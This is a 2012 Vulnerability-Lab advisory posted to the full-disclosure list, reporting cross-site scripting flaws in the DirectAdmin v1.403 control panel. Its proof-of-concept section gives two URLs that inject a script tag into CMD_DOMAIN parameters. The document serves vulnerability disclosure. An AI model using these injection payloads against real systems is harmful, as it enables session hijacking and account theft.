[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] DirectAdmin v1.403 - Multiple Cross Site Vulnerabilities
From: Research <research () vulnerability-lab ! com>
Date: 2012-04-26 21:27:37
Message-ID: 4F99BDC9.9050406 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
DirectAdmin v1.403 - Multiple Cross Site Vulnerabilities
Date:
=====
2012-04-25
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=509
VL-ID:
=====
509
Introduction:
=============
DirectAdmin is a graphical web-based web hosting control panel designed to make administration
of websites easier. DirectAdmin is compatible with several versions of Red Hat, Fedora Core, \
Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.DirectAdmin is often called DA \
for short
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/DirectAdmin )
Abstract:
=========
A Vulnerability Laboratory Researcher discovered multiple client side Cross Site Scripting \
Vulnerabilities on DirectAdmins Management Application.
Report-Timeline:
================
2012-04-25: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Low
Details:
========
A client side cross site scripting vulnerability is detected on DirectAdmins Management \
Web-Application. The vulnerability allows an attacker with privileged user account to hijack \
customer/moderator/admin sessions with high required user inter action. Successful \
exploitation can result in account steal or client side context manipulation when processing \
affected module application requests.
Vulnerable Module(s):
[+] CMD_DOMAIN - confirmed=Confirm&delete=yes&select0=
Picture(s):
../1.png
../2.png
Proof of Concept:
=================
The vulnerability can be exploited by remote attacker with medium required user inter action. \
For demonstration or reproduce ...
https://your.ip.to.directadmin:2222/CMD_DOMAIN?action=select&delete=Delete&select8=testtttttttt.plaaaaaa
%22%3Eaaaaaaaaaaaa%3Cscript%3Ealert%28VL%29%3C/script%3E
https://your.ip.to.directadmin:2222/CMD_DOMAIN?confirmed=Confirm&delete=yes&select0=testtttttttt.pl
%3Cscript%3Ealert%28VL%29%3C/script%3E
Risk:
=====
The security risk of the client side cross site vulnerabilities are estimated as low(+).
Credits:
========
Vulnerability Research Laboratory - Dawid Golak (dawid.golak@gmail.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. Any modified copy or reproduction, including partially usages, of \
this file requires authorization from Vulnerability- Lab. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2012 Vulnerability-Lab
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic